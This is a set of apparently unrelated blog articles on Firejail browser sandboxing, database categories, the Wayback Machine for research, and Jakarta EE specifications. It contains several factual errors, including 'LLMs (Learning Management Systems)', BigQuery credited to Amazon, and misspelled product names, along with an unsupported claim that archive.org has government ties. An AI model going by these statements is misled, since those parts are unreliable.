Another reason for using sandboxes is to isolate programs for security reasons. Here, the primary concern is protecting privacy. The goal is to prevent a program from accessing other data on the computer. Therefore, in this context, we often refer to it as creating a “jail.” The classic example we’re talking about here is the web browser. In my opinion, I see the smartphone as far more problematic in this scenario, where this data theft is quite easy for any user to observe. Without being sarcastic, I regularly see people who fortify their computers like fortresses and carelessly distribute all their data from their smartphones to the world.

It’s an open secret in expert circles that websites, especially those of large tech companies, employ all sorts of tricks to know their users better than the users know themselves. For outsiders, these expert opinions often seem incomprehensible, which frequently manifests as resignation or indifference. To avoid delving too deeply into the subject, I’d like to illustrate just how sophisticated these methods are with a simple example. Anyone who believes that a VPN connection offers maximum privacy protection is fatally mistaken. Just because you mask your IP address doesn’t mean you can’t deduce your actual location. And you don’t even have to try very hard to do so. For example, someone who claims to be logging into the internet from Germany, but whose web browser is set to Russian as the language and Moscow as the time zone, is probably not actually in Germany. Of course, tech companies like LinkedIn or Facebook collect far more information about their users. Each individual measure might seem rather trivial in isolation, but when you combine the various possibilities, the situation changes fundamentally. That’s why it’s absolutely essential to consider security as a holistic concept.

We see that building an effective jail requires significantly more specialized knowledge and experience than simply installing software. AppAmor on Linux is a prime example. Furthermore, it’s crucial to understand that sandboxing your browser also presents challenges. These include access to hardware like microphones and cameras during video conferences, as well as file downloads and uploads. Since the browser is isolated from the rest of the system, you can’t just quickly post photos to Facebook. Anyone considering this should take the time to fully consider these implications.

Having discussed the “why” in detail, let’s move on to the “how.” I’ve already mentioned the two most popular tools, FireJail and BubbleWarp. Because this article is aimed at power users, not IT professionals with specialized knowledge, my focus is on an easy-to-use solution. That’s why I chose FireJail [1], which, although it requires downloading and manual installation, has an active community and, unlike BubbleWarp, comes with documentation.

After downloading [2] FireJail and FireTools for the corresponding distribution, both programs can be easily installed. In my case, I’m using a current Debian Linux distribution, so I downloaded the .deb files from the website and installed them easily with a simple double-click via the package manager. Of course, this also works with the standard Debian package manager, APT. However, to stay up-to-date, I prefer the first installation method.

sudo apt-get install firejail firetool
ed:~$ firejail --help
firejail version 0.9.80

Firejail is a SUID sandbox program that reduces the risk of security breaches by restricting the running environment of untrusted applications using Linux namespaces.

Usage: firejail [options] [program and arguments]

I started the Firejail Configuration Wizard via the application menu.

This opens a wizard for configuring applications as sandboxes. This differs from the console command in that the command line places all FireJail-supported programs into a sandbox. However, this could restrict functionality so much that it becomes unusable for everyday tasks.

sudo firecfg

This allows you to launch applications in the sandbox via the icons in the window manager menu or file links in the file manager. This automated method currently supports the desktop environments Mate, KDE, LXDE, Cinnamon, and LXDE. Support for Gnome 3 and Unity is limited. Simply double-click the desktop icon in Firetools or use the command firetools firefox in the Bash shell. Alternatively, you can launch FireTools directly. FireTools is a graphical launcher for applications running in the sandbox via FireJail.

In my example, I configured the Firefox web browser using FireJail’s default configuration. It’s possible to use custom configurations for each installed application. The corresponding configuration files are located in the logged-in user’s home directory: ~/.config/firejail/<app>.profile and /etc/firejail/<app>.profile.

# Firejail profile for firefox
# Description: Safe and easy web browser from Mozilla
# This file is overwritten after every install/update
# Persistent local customizations
include firefox.local
# Persistent global definitions
include globals.local

# Note: Sandboxing web browsers is as important as it is complex. Users might
# be interested in creating custom profiles depending on the use case (e.g. one
# for general browsing, another for banking, ...). Consult our FAQ/issue
# tracker for more information. Here are a few links to get you going:
# https://github.com/netblue30/firejail/wiki/Frequently-Asked-Questions#firefox-doesnt-open-in-a-new-sandbox-instead-it-opens-a-new-tab-in-an-existing-firefox-instance
# https://github.com/netblue30/firejail/wiki/Frequently-Asked-Questions#how-do-i-run-two-instances-of-firefox
# https://github.com/netblue30/firejail/issues/4206#issuecomment-824806968

# (Ignore entry from disable-common.inc)
ignore read-only ${HOME}/.config/mozilla/firefox/profiles.ini
ignore read-only ${HOME}/.mozilla/firefox/profiles.ini

noblacklist ${HOME}/.cache/mozilla
noblacklist ${HOME}/.config/mozilla
noblacklist ${HOME}/.mozilla
noblacklist ${RUNUSER}/*firefox*
noblacklist ${RUNUSER}/psd/*firefox*

# uses libgdk-pixbuf and/or glycin - see #6906
#blacklist /usr/libexec

mkdir ${HOME}/.cache/mozilla/firefox
mkdir ${HOME}/.config/mozilla
mkdir ${HOME}/.mozilla
whitelist ${HOME}/.cache/mozilla/firefox
whitelist ${HOME}/.config/mozilla
whitelist ${HOME}/.mozilla

whitelist /usr/share/firefox
whitelist /usr/share/gnome-shell/search-providers/firefox-search-provider.ini
whitelist ${RUNUSER}/*firefox*
whitelist ${RUNUSER}/psd/*firefox*

# Note: Firefox requires a shell to launch on Arch and Fedora.
# Add the next lines to firefox.local to enable private-bin.
#private-bin bash,dbus-launch,dbus-send,env,firefox,sh,which
#private-bin basename,bash,cat,dirname,expr,false,firefox,firefox-wayland,getenforce,ln,mkdir,pidof,restorecon,rm,rmdir,sed,sh,tclsh,true,uname
private-etc firefox

dbus-user filter
dbus-user.own org.mozilla.*
dbus-user.own org.mpris.MediaPlayer2.firefox.*
ignore dbus-user none

# Redirect
include firefox-common.profile

Since configuring each individual application can quickly become very complex, and one must always consider what one wants to achieve with sandboxing, I refer you to the homepage [1] for further information.

On the command line, you can list all applications currently started via Firejail. This allows you to check whether the sandbox is working for the respective application. Two commands are available for this purpose: firejail --list and firejail --top. The top parameter displays the process load in the Bash shell.

However, I did notice one limitation during my test: Browsers in virtual machines, in particular, refuse to start under Firejail. This is, of course, somewhat pointless, as virtual machines already provide excellent isolation between the application and the operating system.

Fazit

In my opinion, the idea of ​​sandboxing is quite appealing. My criticism lies more in its implementation. I would view virtualization in a more traditional way, as implemented, for example, with Docker or PlayOnLinux. A sandbox would essentially create a virtual environment on my desktop into which I could install programs in isolation, without altering the operating system. If the sandbox is deleted, all files of the installed program, including its configuration, are completely removed. However, FireJail works differently. FireJail identifies all installed programs that can be jailed, in order to run them in a so-called cage. Launching AppImages in FireJail also generally doesn’t work. Based on my experience in security and penetration testing, I consider the cost-benefit ratio, especially for FireJail, to be insufficient, and I also believe that the way FireJail works gives users a false sense of security. Updates are also a problem, as they often silently reset security-related settings to unwanted defaults.

Resources


Databases: the choice of torture

The permanent storage of data is called persistence in technical terms. To be able to access this data again, software is needed that structures and searches it. Such software is called a Database Management System (DBMS). To access a database from a programming language like Java, Ruby, Python, or PHP, a corresponding driver is required. This driver is often referred to as a client, because the DBMS is the server that allows access for multiple clients. In this article, we won’t focus on how to connect to the respective databases with which programming language, but rather on the different database technologies and their applications.

[Relational DB (rows, columns) | GIS DB | embedded DB]
[NoSQL | Key Value Store | Document DB (JSON, XML) | Graph DB | Time Series Server]

There are now numerous solutions to choose from for classic database systems, the so-called relational databases. Both commercial and professional free open-source options are vying for users’ attention. Most web hosting providers offer their users the choice between the free DBMS MySQL (Oracle) and MariaDB (a fork of MySQL after its acquisition by Oracle) for data storage. However, those who can manage their own servers can, of course, opt for the more professional PostgreSQL.

PostgreSQL is rather unsuitable for most standard PHP applications, although WordPress and Joomla do support this database system. Problems usually arise with the developers of extensions. Instead of using the application’s interfaces, database access is often achieved by ignorantly using MySQL’s native commands.

In commercial application development, Oracle or Microsoft SQL Server are typically used, depending on familiarity with the Microsoft Windows environment. The reason for using commercial database servers lies in the costly support available when vulnerabilities and bugs are discovered. Business-critical applications must ensure the continued existence of both the vendor and their customers. The speed of delivery of security patches is a particularly significant reason for using commercial software.

The functionality of relational databases is defined by tables. The columns of a table define the properties, and a row of the table represents the data record. To access an explicit data record, a column (primary key) must contain unique entries that do not appear again in that column. This property of the primary key is called uniqueness. Primary keys allow for the establishment of relationships, or relations, between tables. To keep this article from becoming excessively long, I will limit my in-depth discussion of the functionality of relational databases to this point and move on to the next category.

Of course, there are also relational databases that operate in a column-oriented rather than row-oriented manner. This enables more efficient queries and analyses, especially with large datasets. Here are some of the main features and benefits of column-oriented databases:

  • Data organization: Stores data in columns, which speeds up the processing of specific columns in queries.
  • Compression: Often offers better compression rates for columnar data because similar data types are stored together.
  • Analytical queries: Optimized for analysis and aggregate queries that need to quickly process large amounts of data.
  • Reduced I/O: Reduces the amount of data that needs to be read from disk, as only the required columns are retrieved.

Column-oriented databases include Apache Cassandra, SAP Hanna, DB2, and Amazon BigQuery, with classic use cases for:

  • Business Intelligence: Ideal for databases that need to process large amounts of data for analytical purposes.
  • Data Warehousing: Efficient storage and analysis of historical data.
  • Real-time analytics: Suitable for applications that require rapid decisions based on current data.
IDsupplierarticlepricepackageamount
13MongoDBJSON7.88piece1
21XindiceXML15.67piece1
// Row-oriented DBMS
[{13, MongoDB, JSON, 7.88, piece, 1} {21, Xindice, XML, 15.67, piece, 1}]

// Column-oriented DBMS
[{13,21} {MongoDB, Xindice} {JSON, XML} {7.88, 15.67} {piece, piece} {1, 1}]

To provide data for geographic information systems (GIS) like Google Maps, so-called geospatial databases are used. Geospatial databases are extensions of relational databases that provide tables and relations optimized and standardized for geometric objects. The GIS extension for PostgreSQL is called PostGIS. The datasets for the freely available OpenStreetMap are in a specialized XML format but can also be transformed into geospatial data structures.

Key-value stores are often used in configuration files. However, if you want to build a fast caching system, you need a bit more complexity. This is because the key/value relationship can range from simple strings to complex objects. Basically, a store consists of a unique key to which values ​​can be assigned depending on the data type. Data types can be strings, numbers (integers, floats), Boolean values, and lists. Key-value databases belong to the NoSQL database family because, unlike relational databases, queries are not performed using SQL but are database- and vendor-specific.

Typical key-value databases include Redis, MemCached, Amazon DynamoDB, and the somewhat outdated BarkleyDB, which was acquired by Oracle. A characteristic of key-value databases is that data is stored in memory and backed up to disk at regular intervals. Keeping data in RAM naturally requires a machine with sufficient RAM. Especially with large applications, an enormous amount of data can accumulate for caching.

Another category of databases is embedded databases. “Embedded” refers to the database server itself. Specifically, this means that the database system is not a standalone installation but rather a library integrated into the application. The advantage of this solution is a simpler application installation process. However, this often comes at the expense of security, as many embedded databases lack a dedicated user management layer. This is particularly true for SQLite and the Java-implemented H2. Even the previously mentioned NoSQL BarkelyDB, available as a Java or C library, lacks user management. This means that anyone with access to the application can use a client to read data from the database. Therefore, these systems are not suitable for applications requiring a high level of security.

Regarding the Java version of BarkelyDB, the last available implementation dates back to 2017 and is available as source code in Java/Apache Ant, but this code must be compiled manually. An official binary from Oracle is no longer available, but unofficial versions can be found in the Maven Central Repository.

Anyone wanting to integrate a fully functional relational database into their application can use the embedded version of PostgreSQL – pgx – which provides all the functions of the PostgreSQL server locally.

The next class of databases belongs to the NoSQL category: document-based databases. The two DBMSs, MongoDB and CouchDB, are quite similar in their feature set, but there are significant differences.

  • MongoDB is often chosen for applications requiring complex queries and real-time analytics due to its comprehensive query language and high performance.
  • CouchDB is particularly well-suited for applications that require reliability, a distributed architecture, and easy replication, especially in scenarios where offline access is essential.

The fundamental way document databases work is that the schema is derived from the underlying data structure. These data structures are usually in JSON format and are accessed accordingly. Documents of the same data structure are assigned to a collection. Therefore, these databases don’t store classic office documents, but rather formats like JSON and XML. Document databases that specialize in XML include Oracle XML DB and Apache Xindice.

Many web developers specializing in front-end (UX/UI) development frequently use document databases. This allows them to store data in JSON format to simulate RESTful access and thus populate the dynamic content of the user interface.

A very exotic variant of NoSQL databases are graph databases, which represent data as graphs. This storage format allows for the efficient storage of information according to relationships. Such relationships can be links between websites or a person’s representation on social media. Even the complex relationships used in recommendation systems can be represented as graphs. The following figure shows a simple example of a graph database implemented in Java using Neo4j, to illustrate its use case.

Other graph databases include Amazon Neptune and ArangoDB.

Finally, I’d like to introduce time series. Since monitoring has become essential, especially in the context of application operation, data presented as time series has gained in importance. Typical databases that specialize in processing time series are Prometheus and InfluxDB. However, there are also corresponding extensions for classic relational databases. The PostgreSQL database, which has already been mentioned several times, also has a corresponding extension for this use case called TimescaleDB.

Of course, much more could be said about this topic. After all, countless books on databases fill several meters of library shelves. However, this should suffice for an introduction and an overview of the various database systems and NoSQL solutions. With the information from this article, you now have an idea of ​​which database is suitable for your specific use case. We have also seen that relational databases, especially the free and open-source database PostgreSQL with its available extensions, are very versatile. Further topics related to databases include data modeling and security against hacker attacks.


The internet never forgets.

The internet has its own unique memory that forgets almost nothing. Part of this memory is archive.org, a project initiated by Brewster Kahle in 1996, which has made it its mission to archive the internet. A central component of archive.org is the Wayback Machine.

According to its own figures, the Wayback Machine has access to a database of approximately 1 trillion web pages. Similar to Google, the Wayback Machine is operated via a simple search field. In this search field, you can search for either a specific internet domain or a specific keyword. If something related to the search term is stored in archive.org’s database, the calendar view shows the date on which a so-called snapshot was created. All content from a domain that was freely accessible on that day was included in the snapshot. This makes it easy to recover content that has already been deleted.

However, when working with the Wayback Machine, you need to be aware of certain conditions. While archive.org is a non-profit organization that is financed by donations, there are still some limitations. Furthermore, archive.org is headquartered in the United States. Considering the enormous costs incurred simply for collecting and storing the data, it’s more than just a suspicion that this project has close ties to government agencies. Official bodies also have considerable reasons for wanting such a service without having to adhere to the strict regulations of official government organizations.

One problem that arises from working with the Wayback Machine is the frequency of changes to the archived homepages. Especially with small websites, several changes are made between snapshots. But even seemingly large websites, like spiegelonline.de, don’t have a daily snapshot, as one might expect. The reasons for this are quite varied. In addition, there are various mechanisms that prevent crawlers from indexing the website. The purpose of such efforts can be, among other things, to limit traffic on the server itself, so that resources are available to readers and not blocked by bots.

Another issue arising from this massive amount of data is, of course, the potential use of artificial intelligence to train large LLMs (Learning Management Systems). Large platforms fear losing their users, an aspect I addressed back in 2023. In February 2026, there was also a public discussion on this topic between Wayback Machine board member Mark Graham and Nieman Lab, which can also be found as a blog post at archive.org. Most website operators face this problem, as creating and publishing content costs both time and money. In the case of elmar-dott.com, this includes expenses for the server, domain, books, and various subscriptions. Since we explicitly oppose automated content creation, all articles on elmar-dott.com are based on concrete experience and in-depth research into the respective topics. This also means that many of the solutions described are actually used by the authors themselves. To prevent AI from harvesting the content and thus limiting our visitors to web crawlers, high-quality information is only accessible via subscription. This applies particularly to references, source code, and selected articles.

Another aspect, of course, is the trustworthiness of the stored content. Even though archive.org’s motto is non-profit and its efforts to ensure a freely accessible internet, this doesn’t mean that archive.org doesn’t potentially pursue other, unofficial interests. Electronically stored content is known to be easily manipulated. Therefore, the content collected via archiving services should be considered more of an indicator. Of course, there are ways to protect the collected content from alteration. Blockchain technology would be one such way to detect manipulation.

In the premium article “Harvest Time,” I describe how to gather information using various free and paid APIs. The Wayback Machine can also be used for sensitive research tasks. Because, as is so often the case, mistakes happen in business. Small mishaps are simply human, and sometimes companies can ‘accidentally’ publish sensitive internal information. This could be error messages on the website that reveal which DBMS or server is in use. As soon as you become aware that potentially misusable information appears in any database, the first step is to contact the database owner and request its removal. Often, an explanation and a friendly word are all it takes.

Of course, archive.org isn’t solely focused on websites. Its goal is to create a comprehensive library, which naturally includes digitizing copyright-free books, similar to Project Gutenberg. But films, audio, and software can also be found in the archive. Interestingly, archive.org can also be found on the Onion Tor network under its own Onion domain.

Of course, archive.org isn’t the only organization trying to preserve the internet. The website archive.today also has this goal. However, archive.today’s database isn’t as comprehensive. On the other hand, you can quickly submit your own URL via an input field, and your website will be added to their archive.

As we can see, there are certainly some gems on the internet. You don’t have to be a journalist to delve deeply into research techniques. The field of reconnaissance in cybersecurity also requires a certain amount of intuition. There’s a reason they say: knowledge is power.


Java Enterprise in briefly detail

If you plan to get in touch with Java Enterprise, may in the beginning it’s a bit overwhelmed and confusing. But don’t worry It’s not so worst like it seems. To start with it, you just need to know some basics about the ideas and concepts.

The Java Series

last changed:

As first Java EE is not a tool nor a compiler you download and use it in the same manner like Java Development Kit (JDK) also known as Software Development Kit (SDK). Java Enterprise is a set of specifications. Those specifications are supported by an API and the API have a reference implementation. The reference implementation is a bundle you can download and it’s called Application Server.

Since Java EE 8 the Eclipse Foundation maintain Java Enterprise. Oracle and the Eclipse Foundation was not able to find a common agreement for the usage of the Java Trademark, which is owned by Oracle. The short version of this story is that the Eclipse Foundation renamed JavaEE to JakartaEE. This has also an impact to old projects, because the package paths was also changed in Jakarta EE 9 from javax to jakarta. Jakarta EE 9.1 upgrade all components from JDK 8 to JDK 11.

If you want to start with developing Jakarta Enterprise [1] applications you need some prerequisites. As first you have to choose the right version of the JDK. The JDK already contains the runtime environment Java Vitual Machine (JVM) in the same version like the JDK. You don’t need to install the JVM separately. A good choice for a proper JDK is always the latest LTS Version. Java 17 JDK got released 2021 and have support for 3 years until 2024.

If you wish to overcome the Oracle license restrictions you may could switch to an free Open Source implementation of the JDK. One of the most famous free available variant of the JDK is the OpenJDK from adoptium [2]. Another interesting implementation is GraalVM [3] which is build on top of the OpenJDK. The enterprise edition of GraalVM can speed up your application 1.3 times. For production system a commercial license of the enterprise edition is necessary. GraalVM includes also an own Compiler.

  Version  Year  JSR  Servlet  Tomcat  JavaSE
J2EE – 1.21999
J2EE – 1.32001JSR 58
J2EE – 1.42003JSR 151
Java EE 52006JSR 244
Java EE 62009JSR 316
Java EE 72013JSR 342
Java EE 82017JSR 366
Jakarta 820194.09.08
Jakarta 920205.010.08 & 11
Jakarta 9.120215.010.011
Jakarta 1020226.010.111
Jakarta 1120236.111.017
Jakarta 12under development6.221

The table above is not complete but the most important current versions are listed. Feel free to send me an message if you have some additional information are missing in this overview.

You need to be aware, that the Jakarta EE Specification needs a certain Java SDK and the Application Server maybe need as a runtime another Java JDK. Both Java Versions don’t have to be equal.

Dependencies (Maven):

<dependency>
    <groupId>jakarta.platform</groupId>
    <artifactId>jakarta.jakartaee-api</artifactId>
    <version>${version}</version>
    <scope>provided</scope>
</dependency> 
XML
<dependency>
    <groupId>org.eclipse.microprofile</groupId>
    <artifactId>microprofile</artifactId> 
    <version>${version}</version>
    <type>pom</type>
    <scope>provided</scope>
</dependency>
XML

In the next step you have to choose the Jakarta EE environment implementation. This means decide for an application server. It’s very important that the application server you choose can operate on the JVM version you had installed on your system. The reason is quite simple, because the application server is implemented in Java. If you plan to develop a Servlet project, it’s not necessary to operate a full application server, a simple Servlet Container like Apache Tomcat (Catalina) or Jetty contains everything is required.

Jakarta Enterprise reference implementations are: Payara (fork of Glassfish), WildFly (formerly known as JBoss), Apache Geronimo, Apache TomEE, Apache Tomcat, Jetty and so on.

May you heard about Microprofile [4]. Don’t get confused about it, it’s not that difficult like it seems in the beginnin. In general you can understand Microprofiles as a subset of JakartaEE to run Micro Services. Microprofiles got extended by some technologies to trace, observe and monitor the status of the service. Version 5 was released on December 2021 and is full compatible to JakartaEE 9.


Core Technologies

Plain Old Java Beans

POJOs are simplified Java Objects without any business logic. This type of Java Beans only contains attributes and its corresponding getters and setters. POJOs do not:

  • Extend pre-specified classes: e. g. public class Test extends javax.servlet.http.HttpServlet is not considered to be a POJO class.
  • Contain pre-specified annotations: e. g. @javax.persistence.Entity public class Test is not a POJO class.
  • Implement pre-specified interfaces: e. g. public class Test implements javax.ejb.EntityBean is not considered to be a POJO class.

(Jakarta) Enterprise Java Beans

An EJB component, or enterprise bean, is a body of code that has fields and methods to implement modules of business logic. You can think of an enterprise bean as a building block that can be used alone or with other enterprise beans to execute business logic on the Java EE server.

Enterprise beans are either (stateless or stateful) session beans or message-driven beans. Stateless means, when the client finishes executing, the session bean and its data are gone. A message-driven bean combines features of a session bean and a message listener, allowing a business component to receive (JMS) messages asynchronously.

(Jakarta) Servlet

Java Servlet technology lets you define HTTP-specific Servlet classes. A Servlet class extends the capabilities of servers that host applications accessed by way of a request-response programming model. Although Servlets can respond to any type of request, they are commonly used to extend the applications hosted by web servers.

(Jakarta) Server Pages

JSP is a UI technology and lets you put snippets of Servlet code directly into a text-based document. JSP files transformed by the compiler to a Java Servlet.

(Jakarta) Server Pages Standard Tag Library

The JSTL encapsulates core functionality common to many JSP applications. Instead of mixing tags from numerous vendors in your JSP applications, you use a single, standard set of tags. JSTL has iterator and conditional tags for handling flow control, tags for manipulating XML documents, internationalization tags, tags for accessing databases using SQL, and tags for commonly used functions.

(Jakarta) Server Faces

JSF technology is a user interface framework for building web applications. JSF was introduced to solve the problem of JSP, where program logic and layout was extremely mixed up.

(Jakarta) Managed Beans

Managed Beans, lightweight container-managed objects (POJOs) with minimal requirements, support a small set of basic services, such as resource injection, lifecycle callbacks, and interceptors. Managed Beans represent a generalization of the managed beans specified by Java Server Faces technology and can be used anywhere in a Java EE application, not just in web modules.

(Jakarta) Persistence API

The JPA is a Java standards–based solution for persistence. Persistence uses an object/relational mapping approach to bridge the gap between an object-oriented model and a relational database. The Java Persistence API can also be used in Java SE applications outside of the Java EE environment. Hibernate and Eclipse Link are some reference Implementation for JPA.

(Jakarta) Transaction API

The JTA provides a standard interface for demarcating transactions. The Java EE architecture provides a default auto commit to handle transaction commits and rollbacks. An auto commit means that any other applications that are viewing data will see the updated data after each database read or write operation. However, if your application performs two separate database access operations that depend on each other, you will want to use the JTA API to demarcate where the entire transaction, including both operations, begins, rolls back, and commits.

(Jakarta) API for RESTful Web Services

The JAX-RS defines APIs for the development of web services built according to the Representational State Transfer (REST) architectural style. A JAX-RS application is a web application that consists of classes packaged as a servlet in a WAR file along with required libraries.

(Jakarta) Dependency Injection for Java

Dependency Injection for Java defines a standard set of annotations (and one interface) for use on injectable classes like Google Guice or the Sprig Framework. In the Java EE platform, CDI provides support for Dependency Injection. Specifically, you can use injection points only in a CDI-enabled application.

(Jakarta) Contexts & Dependency Injection for Java EE

CDI defines a set of contextual services, provided by Java EE containers, that make it easy for developers to use enterprise beans along with Java Server Faces technology in web applications. Designed for use with stateful objects, CDI also has many broader uses, allowing developers a great deal of flexibility to integrate different kinds of components in a loosely coupled but typesafe way.

(Jakarta) Bean Validation

The Bean Validation specification defines a metadata model and API for validating data in Java Beans components. Instead of distributing validation of data over several layers, such as the browser and the server side, you can define the validation constraints in one place and share them across the different layers.

(Jakarta) Message Service API

JMS API is a messaging standard that allows Java EE application components to create, send, receive, and read messages. It enables distributed communication that is loosely coupled, reliable, and asynchronous.

(Jakarta) EE Connector Architecture

The Java EE Connector Architecture is used by tools vendors and system integrators to create resource adapters that support access to enterprise information systems that can be plugged in to any Java EE product. A resource adapter is a software component that allows Java EE application components to access and interact with the underlying resource manager of the EIS. Because a resource adapter is specific to its resource manager, a different resource adapter typically exists for each type of database or enterprise information system.

The Java EE Connector Architecture also provides a performance-oriented, secure, scalable, and message-based transactional integration of Java EE platform–based web services with existing EISs that can be either synchronous or asynchronous. Existing applications and EISs integrated through the Java EE Connector Architecture into the Java EE platform can be exposed as XML-based web services by using JAX-WS and Java EE component models. Thus JAX-WS and the Java EE Connector Architecture are complementary technologies for enterprise application integration (EAI) and end-to-end business integration.

(Jakarta) Mail API

Java EE applications use the JavaMail API to send email notifications. The JavaMail API has two parts:

  • An application-level interface used by the application components to send mail
  • A service provider interface

The Java EE platform includes the JavaMail API with a service provider that allows application components to send Internet mail.

(Jakarta) Authorization Contract for Containers

The JACC specification defines a contract between a Java EE application server and an authorization policy provider. All Java EE containers support this contract. The JACC specification defines java.security.Permission classes that satisfy the Java EE authorization model. The specification defines the binding of container-access decisions to operations on instances of these permission classes. It defines the semantics of policy providers that use the new permission classes to address the authorization requirements of the Java EE platform, including the definition and use of roles.

(Jakarta) Authentication Service Provider Interface for Containers

The JASPIC specification defines a service provider interface (SPI) by which authentication providers that implement message authentication mechanisms may be integrated in client or server message-processing containers or runtimes. Authentication providers integrated through this interface operate on network messages provided to them by their calling containers. The authentication providers transform outgoing messages so that the source of each message can be authenticated by the receiving container, and the recipient of the message can be authenticated by the message sender. Authentication providers authenticate each incoming message and return to their calling containers the identity established as a result of the message authentication.

(Jakarta) EE Security API

The purpose of the Java EE Security API specification is to modernize and simplify the security APIs by simultaneously establishing common approaches and mechanisms and removing the more complex APIs from the developer view where possible. Java EE Security introduces the following APIs:

  • SecurityContext interface: Provides a common, uniform access point that enables an application to test aspects of caller data and grant or deny access to resources.
  • HttpAuthenticationMechanism interface: Authenticates callers of a web application, and is specified only for use in the servlet container.
  • IdentityStore interface: Provides an abstraction of an identity store and that can be used to authenticate users and retrieve caller groups.

(Jakarta) Java API for WebSocket

WebSocket is an application protocol that provides full-duplex communications between two peers over TCP. The Java API for WebSocket enables Java EE applications to create endpoints using annotations that specify the configuration parameters of the endpoint and designate its lifecycle callback methods.

(Jakarta) Java API for JSON Processing

The JSON-P enables Java EE applications to parse, transform, and query JSON data using the object model or the streaming model.

JavaScript Object Notation (JSON) is a text-based data exchange format derived from JavaScript that is used in web services and other connected applications.

(Jakarta) Java API for JSON Binding

The JSON-B provides a binding layer for converting Java objects to and from JSON messages. JSON-B also supports the ability to customize the default mapping process used in this binding layer through the use of Java annotations for a given field, JavaBean property, type or package, or by providing an implementation of a property naming strategy. JSON-B is introduced in the Java EE 8 platform.

(Jakarta) Concurrency Utilities for Java EE

Concurrency Utilities for Java EE is a standard API for providing asynchronous capabilities to Java EE application components through the following types of objects: managed executor service, managed scheduled executor service, managed thread factory, and context service.

(Jakarta) Batch Applications for the Java Platform

Batch jobs are tasks that can be executed without user interaction. The Batch Applications for the Java Platform specification is a batch framework that provides support for creating and running batch jobs in Java applications. The batch framework consists of a batch runtime, a job specification language based on XML, a Java API to interact with the batch runtime, and a Java API to implement batch artifacts.

Resources

Notice: I try to keep this post up to date, but mistakes could happen. Please feel free to drop me a message, if you detected some mistakes or if you have some suggestions. If you like this article it would be great to leave a thumbs up and share with friends and colleges.